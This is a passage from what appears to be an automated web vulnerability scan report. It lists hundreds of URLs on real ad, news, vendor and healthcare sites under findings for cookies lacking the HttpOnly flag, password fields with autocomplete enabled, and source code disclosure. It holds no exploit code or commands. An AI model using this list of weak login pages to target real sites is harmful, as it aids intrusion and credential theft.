15.277. http://www.youtube.com/results

15.278. http://www.youtube.com/watch

15.279. https://www1.gotomeeting.com/register/451586600

15.280. http://www22.glam.com/cTagsImgCmd.act

15.281. http://www35.glam.com/gad/glamadapt_jsrv.act

15.282. http://www35.glam.com/gad/glamadapt_jsrv.act

15.283. http://xads.zedo.com/ads2/c

15.284. http://xads.zedo.com/ads3/a

15.285. http://xml.west.REDACTED.overture.com/d/search/p/REDACTED/xml/en-au/v8/

15.286. http://yads.zedo.com/ads3/a

16. Cookie without HttpOnly flag set

16.1. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22

16.2. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7

16.3. https://admin.iconnection.com/login.aspx

16.4. http://ads.adxpose.com/ads/ads.js

16.5. http://ads.shopstyle.com/

16.6. https://auth.tek.com/mytek/faces/forgotpassword.jsp

16.7. https://auth.tek.com/mytek/faces/loginregistration.jsp

16.8. https://auth.tek.com/mytek/faces/scripts/forms.js

16.9. https://auth.tek.com/mytek/faces/scripts/jsr_class.js

16.10. https://auth.tek.com/mytek/faces/scripts/sm.js

16.11. https://auth.tek.com/mytek/faces/scripts/webservice.js

16.12. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.13. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.14. https://clientcommunity.touchnet.com/web/

16.15. https://customer.trizetto.com/OnyxCustomerPortal/

16.16. https://customer.trizetto.com/OnyxCustomerPortal/home.asp

16.17. https://customer.trizetto.com/OnyxCustomerPortal/menu.asp

16.18. http://cx.trizetto.com/

16.19. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.20. http://dte.sellpoint.net/spcm/dm

16.21. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

16.22. http://e-sites2.tek.com/mytek/faces/scripts/forms.js

16.23. http://e-sites2.tek.com/mytek/faces/scripts/jsr_class.js

16.24. http://e-sites2.tek.com/mytek/faces/scripts/sm.js

16.25. http://e-sites2.tek.com/mytek/faces/scripts/webservice.js

16.26. http://e-sites2.tek.com/mytek/faces/startresource.jsp

16.27. http://enjmp.com/links/

16.28. http://entertainment.glam.com/

16.29. http://event.adxpose.com/event.flow

16.30. http://glamnewlive.disqus.com/remote_auth.js

16.31. https://idesk.infocrossing.com/

16.32. http://living.glam.com/

16.33. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.34. http://support.logrhythm.com/ics/support/default.asp

16.35. https://support.logrhythm.com/ics/default.asp

16.36. https://support.logrhythm.com/ics/support/LeftSplash.asp

16.37. https://support.logrhythm.com/ics/support/default.asp

16.38. https://support.logrhythm.com/ics/support/mylogin.asp

16.39. http://t.mookie1.com/t/v1/imp

16.40. https://tracker.i-structure.com/

16.41. http://vpswebserver.com/

16.42. http://www.glam.com/

16.43. http://www.glam.com/category/uncategorized/

16.44. http://www.glam.com/wp-content/themes/glam_v1/glam-login/login_template.php

16.45. http://www.glam.com/xmlrpc.php

16.46. http://www.glammedia.com/about_glam/our_story/index.php

16.47. http://www.insurancemgr.com/ppc/health.php

16.48. http://www.linkedin.com/cws/share-count

16.49. https://www.medicare-solution.com/mss/home/Index.jsp

16.50. http://www.patlive.com/appointment-scheduling/

16.51. https://www.placemyad.com.au/employment/doSelectReach

16.52. http://www.playtexbramakeover.com/

16.53. http://www.realestate.com.au/

16.54. http://www.sfaxme.com/index.php

16.55. http://www.simplyyours.co.uk/shop/nav/show.action

16.56. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

16.57. http://www.thefashionablegal.com/xmlrpc.php

16.58. http://www.thefashionablehousewife.com/wp-login.php

16.59. http://www.thehousehuntershandbook.com/public/listingSingle.do

16.60. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

16.61. http://www.topcareerschools.com/s/279-390/12823153/

16.62. http://www.topstockanalysts.com/land/tsa/top-12-dssnow.asp

16.63. http://www.touchnet.com/web/display/TN/Home

16.64. http://www.trizetto.com/hpSolutions/hipaa.asp

16.65. http://www.trulia.com/homeroll/MA/Rehoboth/

16.66. http://www.twisted-silver.com/

16.67. http://www.webmgr8.com/index.cfm

16.68. http://www.wildflowerlinens.com/products/table-linen

16.69. http://www.wiseshop.com/shop.php

16.70. https://www1.gotomeeting.com/register/451586600

16.71. http://www2.idexpertscorp.com/contact/

16.72. http://www2.tek.com/cmswpt/evfinder.lotr

16.73. http://www2.tek.com/cmswpt/pidetails.lotr

16.74. http://www2.tek.com/cmswpt/podetails.lotr

16.75. http://www2.tek.com/cmswpt/pofinder.lotr

16.76. http://www2.tek.com/cmswpt/prdetails.lotr

16.77. http://www2.tek.com/cmswpt/prfinder.lotr

16.78. http://www2.tek.com/cmswpt/psdetails.lotr

16.79. http://www2.tek.com/cmswpt/swfinder.lotr

16.80. http://www2.tek.com/cmswpt/tidetails.lotr

16.81. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.82. http://ad.afy11.net/ad

16.83. http://ad.amgdgt.com/ads/

16.84. http://ad.linksynergy.com/fs-bin/show

16.85. http://ad.linksynergy.com/fs-bin/show

16.86. http://ad.turn.com/server/ads.js

16.87. http://ad.turn.com/server/pixel.htm

16.88. http://ad.yabuka.com/statsin/adframe/693/300x250

16.89. http://ad.yabuka.com/statsin/adframe/903/300x250

16.90. http://ad.yieldmanager.com/iframe3

16.91. http://ad.yieldmanager.com/imp

16.92. http://ad.yieldmanager.com/pixel

16.93. http://ad.yieldmanager.com/unpixel

16.94. http://adfarm.mediaplex.com/ad/js/6726-112732-1178-13

16.95. http://admonkey.dapper.net/AdBriteUIDMonster

16.96. http://ads.adbrite.com/adserver/behavioral-data/8201

16.97. http://ads.adbrite.com/adserver/behavioral-data/8204

16.98. http://ads.adbrite.com/adserver/vdi/682865

16.99. http://ads.adbrite.com/adserver/vdi/712156

16.100. http://ads.adbrite.com/adserver/vdi/742697

16.101. http://ads.adbrite.com/adserver/vdi/753292

16.102. http://ads.adbrite.com/adserver/vdi/779045

16.103. http://ads.adbrite.com/adserver/vdi/810647

16.104. http://ads.adbrite.com/adserver/vdi/830697

16.105. http://ads.pointroll.com/PortalServe/

16.106. http://ads.revsci.net/adserver/ako

16.107. http://ads.revsci.net/adserver/ako

16.108. http://ads.revsci.net/adserver/ako

16.109. http://ads.revsci.net/adserver/ako

16.110. http://ads.revsci.net/adserver/ako

16.111. http://ads.revsci.net/adserver/ako

16.112. http://ads.revsci.net/adserver/ako

16.113. http://ads.revsci.net/adserver/ako

16.114. http://ads.revsci.net/adserver/ako

16.115. http://ads.revsci.net/adserver/ako

16.116. http://ads.revsci.net/adserver/ako

16.117. http://ads.revsci.net/adserver/ako

16.118. http://ads.revsci.net/adserver/ako

16.119. http://ads.revsci.net/adserver/ako

16.120. http://ads.revsci.net/adserver/ako

16.121. http://ads.revsci.net/adserver/ako

16.122. http://ads.revsci.net/adserver/ako

16.123. http://ads.revsci.net/adserver/ako

16.124. http://ads.revsci.net/adserver/ako

16.125. http://ads.revsci.net/adserver/ako

16.126. http://ads.revsci.net/adserver/ako

16.127. http://ads.revsci.net/adserver/ako

16.128. http://ads.specificmedia.com/serve/v=5

16.129. http://ads2.adbrite.com/v0/ad

16.130. http://ads2.adbrite.com/v0/ad

16.131. http://adsfac.us/ag.asp

16.132. http://adx.hwtm.com/www/delivery/spc.php

16.133. http://afe.specificclick.net/

16.134. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

16.135. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

16.136. http://altfarm.mediaplex.com/ad/js/17975-126683-12284-1

16.137. http://amch.questionmarket.com/adsc/d724925/17/725047/adscout.php

16.138. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php

16.139. http://amch.questionmarket.com/adsc/d724925/4/725047/adscout.php

16.140. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php

16.141. http://amch.questionmarket.com/adsc/d891575/2/891856/adscout.php

16.142. http://amch.questionmarket.com/adsc/d908201/2/41838359/adscout.php

16.143. http://amch.questionmarket.com/adscgen/st.php

16.144. http://api.twitter.com/1/statuses/user_timeline.json

16.145. http://ar.atwola.com/atd

16.146. http://ar.voicefive.com/b/wc_beacon.pli

16.147. http://ar.voicefive.com/bmx3/broker.pli

16.148. http://arts.onbloglist.com/img12.php

16.149. http://au.myspace.com/

16.150. http://b.scorecardresearch.com/b

16.151. http://b.scorecardresearch.com/p

16.152. http://b.scorecardresearch.com/r

16.153. http://b.voicefive.com/b

16.154. http://b3.mookie1.com/1/TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228@Bottom3

16.155. http://bh.contextweb.com/bh/rtset

16.156. http://bidder.mathtag.com/iframe/notify

16.157. http://bing.com/

16.158. http://bing4.com/

16.159. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.160. http://c.atdmt.com/c.gif

16.161. http://c.REDACTED/c.gif

16.162. http://c.statcounter.com/t.php

16.163. http://c7.zedo.com/bar/v16-405/c5/jsc/gl.js

16.164. http://cm.au.REDACTED.overture.com/js_flat_1_0/

16.165. http://cm.netseer.com/redirect

16.166. http://REDACTED/js_1_0/

16.167. http://csc.beap.ad.yieldmanager.net/i

16.168. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

16.169. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

16.170. http://data.cmcore.com/imp

16.171. http://delb.opt.fimserve.com/adopt/

16.172. http://demr.opt.fimserve.com/adopt/

16.173. http://desb.opt.fimserve.com/adopt/

16.174. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

16.175. http://engine.cmmeglobal.com/v1/request

16.176. http://engine.cmmeglobal.com/v1/visitor-event

16.177. http://ev.ads.pointroll.com/event/

16.178. http://f2network.112.2o7.net/b/ss/f2ntheage/1/H.20.2/s36513519773725

16.179. http://glam.grapeshot.co.uk/main/redirect.cgi

16.180. http://glam.ivwbox.de/2004/01/survey.js

16.181. http://glam.ivwbox.de/blank.gif

16.182. http://glam.ivwbox.de/cgi-bin/ivw/CP/GLA_UK_123456

16.183. http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js

16.184. http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js

16.185. http://hits.guardian.co.uk/b/ss/guardiangu-music,guardiangu-network/1/H.22.1/s33948350739665

16.186. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

16.187. http://i.w55c.net/ping_match.gif

16.188. http://idpix.media6degrees.com/orbserv/hbpix

16.189. http://image2.pubmatic.com/AdServer/Pug

16.190. http://jobs.orbitcast.com/a/jbb/find-jobs-json/jbb_widget_list_jobposts/5

16.191. http://jobs.orbitcast.com/a/jbb/promote-widget-vertical-customizable-css/border-CCCCCC/background-FFFFFF/links-ab0404/company-000000/location-909090/width-170

16.192. http://leadback.advertising.com/adcedge/lb

16.193. http://loadus.exelator.com/load/

16.194. http://log.c12s.com/redir/327090/0/740/1396695815192695/0/643921/53/100004/1.ver

16.195. http://lp.idexpertscorp.com/hitech-whitepapera/

16.196. http://lp.idexpertscorp.com/hitech-whitepapera/IDE-Unbounce-footer-A.original_4v7u278ezbx8it4w.jpg

16.197. http://lp.idexpertscorp.com/hitech-whitepapera/bg-grad-fade-edge-ul.original.png

16.198. http://lp.idexpertscorp.com/hitech-whitepapera/bullet.original.jpg

16.199. http://lp.idexpertscorp.com/hitech-whitepapera/button-down.original.jpg

16.200. http://lp.idexpertscorp.com/hitech-whitepapera/button-up.original.jpg

16.201. http://lp.idexpertscorp.com/hitech-whitepapera/form-bottom-CORRECT.original.jpg

16.202. http://lp.idexpertscorp.com/hitech-whitepapera/form-header.original.jpg

16.203. http://lp.idexpertscorp.com/hitech-whitepapera/page_defaults.css

16.204. http://lp.idexpertscorp.com/hitech-whitepapera/reset.css

16.205. http://lp.idexpertscorp.com/hitech-whitepapera/testimonial-arrow.original.gif

16.206. http://lp.idexpertscorp.com/hitech-whitepapera/top-fade.original.jpg

16.207. http://lp.idexpertscorp.com/hitech-whitepapera/version-1-header.original_4v7ufsth145maha8.jpg

16.208. http://map.media6degrees.com/orbserv/aopix

16.209. http://map.media6degrees.com/orbserv/hbpix

16.210. http://media.adfrontiers.com/pq

16.211. http://media.fastclick.net/w/get.media

16.212. http://media.trafficmp.com/a/js

16.213. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnewsau/ros/728x90/jx/ss/a/1623201161@Top1

16.214. http://nmhiltonhead.112.2o7.net/b/ss/nmhiltonhead/1/H.20.3/s3688769728876

16.215. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

16.216. http://open.ad.yieldmanager.net/a1

16.217. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

16.218. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

16.219. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

16.220. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

16.221. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

16.222. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

16.223. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

16.224. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

16.225. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

16.226. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

16.227. http://optimized-by.rubiconproject.com/a/7968/13027/24102-15.js

16.228. http://optimized-by.rubiconproject.com/a/7968/13027/24103-2.js

16.229. http://origin-tracking.trulia.com/trackingPixel.gif

16.230. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

16.231. http://phoenix.untd.com/TRCK/RGST

16.232. http://pix04.revsci.net/E05516/b3/0/3/0902121/268098805.js

16.233. http://pix04.revsci.net/G08769/b3/0/3/0902121/439307182.js

16.234. http://pix04.revsci.net/G08769/b3/0/3/0902121/448568946.js

16.235. http://pix04.revsci.net/G08769/b3/0/3/0902121/47587256.js

16.236. http://pix04.revsci.net/G08769/b3/0/3/0902121/565634184.js

16.237. http://pix04.revsci.net/G08769/b3/0/3/0902121/702929375.js

16.238. http://pix04.revsci.net/G08769/b3/0/3/0902121/717262760.js

16.239. http://pix04.revsci.net/G08769/b3/0/3/0902121/797060244.js

16.240. http://pix04.revsci.net/G08769/b3/0/3/0902121/973395291.js

16.241. http://pixel.33across.com/ps/

16.242. http://pixel.33across.com/ps/189233/

16.243. http://pixel.33across.com/ps/273884/

16.244. http://pixel.33across.com/ps/332046/

16.245. http://pixel.33across.com/ps/41208/

16.246. http://pixel.33across.com/ps/425905/

16.247. http://pixel.33across.com/ps/500284/

16.248. http://pixel.33across.com/ps/682989/

16.249. http://pixel.invitemedia.com/data_sync

16.250. http://pixel.invitemedia.com/pixel

16.251. http://pixel.quantserve.com/pixel

16.252. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

16.253. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

16.254. http://pixel.quantserve.com/seg/r

16.255. http://pixel.rubiconproject.com/di.php

16.256. http://pixel.rubiconproject.com/tap.php

16.257. http://pixel.rubiconproject.com/tap.php

16.258. http://pixel.rubiconproject.com/tap.php

16.259. http://pixel.rubiconproject.com/tap.php

16.260. http://pixel.rubiconproject.com/tap.php

16.261. http://pixel.rubiconproject.com/tap.php

16.262. http://pixel.rubiconproject.com/tap.php

16.263. http://pt200194.unica.com/ntpagetag.gif

16.264. http://r.openx.net/set

16.265. http://r.turn.com/r/beacon

16.266. http://r1-ads.ace.advertising.com/site=743833/size=300250/u=2/bnum=65003685/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.thesunchronicle.com%252Farticles%252F2011%252F05%252F02%252Frehoboth%252F9166782.txt

16.267. http://r1-ads.ace.advertising.com/site=781800/size=728090/u=2/bnum=78594486/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.islandpacket.com%252F2011%252F05%252F02%252F1640363%252Fwill-killing-osama-kill-the-movement.html

16.268. http://r1-ads.ace.advertising.com/site=795866/size=728090/u=2/bnum=47065580/hr=15/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.righthealth.com%252Ftopic%252FWhat_Is_Hipaa%253Fp%253Dl%2526as%253DREDACTED%2526ac%253D529%2526kgl%253D38620759

16.269. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=54085448/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

16.270. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=28266332/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.dailytelegraph.com.au%252Fnews%252Fbreaking-news%252Ftony-abbott-says-migration-proposals-are-weak%252Fstory-e6freuz0-1226045133021%253Ffrom%253Dpublic_rss

16.271. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=29579703/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theaustralian.com.au%252Fnews%252Fnation%252Fabbott-a-hero-on-troubled-christmas-island%252Fstory-e6frg6nf-1226045245809

16.272. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=65424947/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.news.com.au%252Fbreaking-news%252Fnational%252Fchristmas-island-detainee-sews-lips-together%252Fstory-e6frfku9-1226044502823

16.273. http://rd.apmebf.com/w/get.media

16.274. http://s.xp1.ru4.com/meta

16.275. http://segment-pixel.invitemedia.com/pixel

16.276. http://segment-pixel.invitemedia.com/set_partner_uid

16.277. http://statse.webtrendslive.com/dcspqk1vz000004f6a5zba0ke_3h9t/dcs.gif

16.278. https://support.logrhythm.com/FileManagement/Download/08bdb7021bc34da1829ccb8c216d97ba

16.279. https://support.logrhythm.com/FileManagement/Download/e04c558f41be497b8f6340964105111b

16.280. http://sync.mathtag.com/sync/img

16.281. http://t.invitemedia.com/track_imp

16.282. http://tacoda.at.atwola.com/rtx/r.js

16.283. http://tag.contextweb.com/TagPublish/getad.aspx

16.284. http://tags.bluekai.com/site/2312

16.285. http://tags.bluekai.com/site/2312

16.286. http://tags.bluekai.com/site/2731

16.287. http://tags.bluekai.com/site/2748

16.288. http://tags.bluekai.com/site/3358

16.289. http://tags.bluekai.com/site/3890

16.290. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

16.291. http://tap.rubiconproject.com/oz/feeds/targus/profile

16.292. http://tap.rubiconproject.com/oz/sensor

16.293. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

16.294. http://tracking.quisma.com/v.cfs

16.295. http://trgca.opt.fimserve.com/fp.gif

16.296. http://twitter.com/statuses/user_timeline/fashionablegal.json

16.297. http://video.REDACTED.com/soapboxservice2.aspx

16.298. http://widget.linkwithin.com/get_custom_js

16.299. http://widget2.linkwithin.com/get_custom_js

16.300. http://www.abc.net.au/7.30/content/2011/js/swfobject.js

16.301. http://www.abc.net.au/7.30/content/2011/s3200763.htm

16.302. http://www.abc.net.au/crossdomain.xml

16.303. http://www.abc.net.au/favicon.ico

16.304. http://www.abc.net.au/includes/scripts/global.js

16.305. http://www.abc.net.au/news/assets/v5/images/common/footer-bg.png

16.306. http://www.abc.net.au/news/assets/v5/images/common/programs-footer.png

16.307. http://www.abc.net.au/res/abc/logos/footer_logo.png

16.308. http://www.abc.net.au/res/abc/logos/nav_logo.png

16.309. http://www.abc.net.au/res/abc/styles/bg/divider.png

16.310. http://www.abc.net.au/res/abc/styles/bg/footer.png

16.311. http://www.abc.net.au/res/abc/styles/bg/header.png

16.312. http://www.abc.net.au/res/abc/styles/bg/search.png

16.313. http://www.abc.net.au/res/abc/styles/handheld.css

16.314. http://www.abc.net.au/res/abc/styles/print.css

16.315. http://www.abc.net.au/res/abc/styles/screen.css

16.316. http://www.abc.net.au/res/abc/submenus.htm

16.317. http://www.abc.net.au/res/libraries/abcjs/abc.js

16.318. http://www.abc.net.au/res/libraries/cinerama2/cinerama.swf

16.319. http://www.abc.net.au/res/libraries/cinerama2/cinerama_skin_external.swf

16.320. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2.js

16.321. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2_functions.js

16.322. http://www.abc.net.au/res/libraries/cinerama2/scripts/modernizr-1.6.min.js

16.323. http://www.abc.net.au/res/libraries/jquery/jquery-latest-min.js

16.324. http://www.abc.net.au/res/libraries/stats/webTrends/webtrends.js

16.325. http://www.abc.net.au/res/libraries/swfobject/swfobject-2.2.js

16.326. http://www.abc.net.au/res/sites/7.30/images/730-bg.jpg

16.327. http://www.abc.net.au/res/sites/7.30/images/730-content-bg.jpg

16.328. http://www.abc.net.au/res/sites/7.30/images/730-header.jpg

16.329. http://www.abc.net.au/res/sites/7.30/images/730-nav-bg.jpg

16.330. http://www.abc.net.au/res/sites/7.30/images/730-search-button.jpg

16.331. http://www.abc.net.au/res/sites/7.30/styles/printv5.css

16.332. http://www.abc.net.au/res/sites/7.30/styles/screenv5.css

16.333. http://www.abc.net.au/reslib/201104/r757251_6333237.jpg

16.334. http://www.abc.net.au/reslib/201104/r757251_6333241.jpg

16.335. http://www.bing.com/

16.336. http://www.bing.com/twitter/s/icon_rt.gif

16.337. http://www.blogcatalog.com/images/buttons/blogcatalog5.gif

16.338. http://www.blogged.com/icons/rt_1472907.gif

16.339. http://www.blogged.com/icons/vn_sarahjeanb_1472907.gif

16.340. http://www.facebook.com/home.php

16.341. http://www.flickr.com/badge_code_v2.gne

16.342. http://www.glam.de/

16.343. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

16.344. http://www.hipaastore.com/

16.345. https://www.hipaastore.com/index.php

16.346. http://www.infocrossing.com/

16.347. http://www.nexica.com/error404.aspx

16.348. http://www.orgsites.com/index.html

16.349. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

16.350. http://www.righthealth.com/c-javascripts/kapp_relevance.js

16.351. http://www.righthealth.com/images/adore/adlabel.gif

16.352. http://www.righthealth.com/images/adore/adlabelhoriz.gif

16.353. http://www.righthealth.com/images/adore/hidden.gif

16.354. http://www.righthealth.com/images/adore/kosmix.png

16.355. http://www.righthealth.com/images/blankpixel.png

16.356. http://www.righthealth.com/images/health/HONConduct767461_s.gif

16.357. http://www.righthealth.com/images/health/blog_profiles/steven.png

16.358. http://www.righthealth.com/images/health/dailydose-icon-facebook.png

16.359. http://www.righthealth.com/images/health/dailydose-icon-twitter.png

16.360. http://www.righthealth.com/images/health/dailydose-small.png

16.361. http://www.righthealth.com/images/health/exploresuper/icon_article.png

16.362. http://www.righthealth.com/images/health/exploresuper/icon_forums.png

16.363. http://www.righthealth.com/images/health/exploresuper/icon_news.png

16.364. http://www.righthealth.com/images/health/exploresuper/icon_photo.png

16.365. http://www.righthealth.com/images/health/exploresuper/icon_video.png

16.366. http://www.righthealth.com/images/health/favicon.ico

16.367. http://www.righthealth.com/images/mpv.txt

16.368. http://www.righthealth.com/images/pv.txt

16.369. http://www.righthealth.com/images/sprites/fark-sprite.png

16.370. http://www.righthealth.com/images/sprites/favicon-sprite.png

16.371. http://www.righthealth.com/javascripts/adore/ad2.html

16.372. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js

16.373. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js

16.374. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css

16.375. http://www.righthealth.com/topic/What_Is_Hipaa

16.376. http://www.saksfifthavenue.com/main/ProductDetail.jsp

16.377. http://www.shadowtrack.com/index.php

16.378. http://www.shopstyle.com/browse

16.379. http://www.strausnews.com/_captcha/render

16.380. http://www.strausnews.com/_captcha/render

16.381. http://www.stumbleupon.com/submit

16.382. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

16.383. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

16.384. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/index.php

16.385. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/index.php

16.386. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

16.387. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/index.php

16.388. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/index.php

16.389. http://www.thefashionablegal.com/wp-login.php

16.390. http://www.truelocal.com.au/

16.391. http://www.vpswebserver.com/livezilla/server.php

16.392. http://www.webhostingtalk.com/showthread.php

16.393. http://www.weichert.com/search/realestate/PropertyListing.aspx

16.394. http://www.wiseshop.com/contact.html

16.395. http://www.wiseshop.com/sign_up.html

16.396. http://www.wtp101.com/ab_sync

16.397. http://www.youtube.com/api_video_info

16.398. http://www.youtube.com/results

16.399. http://www.youtube.com/watch

16.400. http://www2.idexpertscorp.com/

16.401. http://www2.idexpertscorp.com/blog/

16.402. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/

16.403. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/

16.404. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/

16.405. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/

16.406. http://www2.idexpertscorp.com/page-not-found/

16.407. http://www2.idexpertscorp.com/site/404/

16.408. http://www2.tek.com/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

16.409. http://www2.tek.com/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

16.410. http://www22.glam.com/cTagsImgCmd.act

16.411. http://www35.glam.com/gad/glamadapt_jsrv.act

16.412. http://www35.glam.com/gad/glamadapt_jsrv.act

16.413. http://xads.zedo.com/ads2/c

16.414. http://xads.zedo.com/ads3/a

16.415. http://xml.west.REDACTED.overture.com/d/search/p/REDACTED/xml/en-au/v8/

16.416. http://yads.zedo.com/ads3/a

17. Password field with autocomplete enabled

17.1. https://admin.iconnection.com/login.aspx

17.2. http://au.myspace.com/

17.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

17.4. https://auth.tek.com/mytek/faces/loginregistration.jsp

17.5. https://clientcommunity.touchnet.com/web/login.action

17.6. https://customer.trizetto.com/OnyxCustomerPortal/login.asp

17.7. http://cx.trizetto.com/

17.8. http://designers.glam.com/2011/04/29/wp-content/themes/glam_v1/glam-login/login_template.php

17.9. https://idesk.infocrossing.com/

17.10. https://support.logrhythm.com/ics/support/mylogin.asp

17.11. https://tracker.i-structure.com/

17.12. http://vpswebserver.com/

17.13. http://www.glam.com/profile

17.14. http://www.glam.com/wp-content/themes/glam_v1/glam-login/login_template.php

17.15. https://www.hipaastore.com/index.php

17.16. https://www.hipaastore.com/index.php

17.17. https://www.idexpertscorp.com/RADAR/

17.18. https://www.idexpertscorp.com/dbhc/

17.19. https://www.idexpertscorp.com/membership/

17.20. http://www.patlive.com/appointment-scheduling/

17.21. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

17.22. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

17.23. http://www.thefashionablegal.com/wp-login.php

17.24. http://www.thefashionablehousewife.com/wp-login.php

18. Source code disclosure

18.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

18.2. http://www.glam.com/wp-content/plugins/facebook-activity-feed-widget-for-wordpress/jscolor/jscolor.min.js

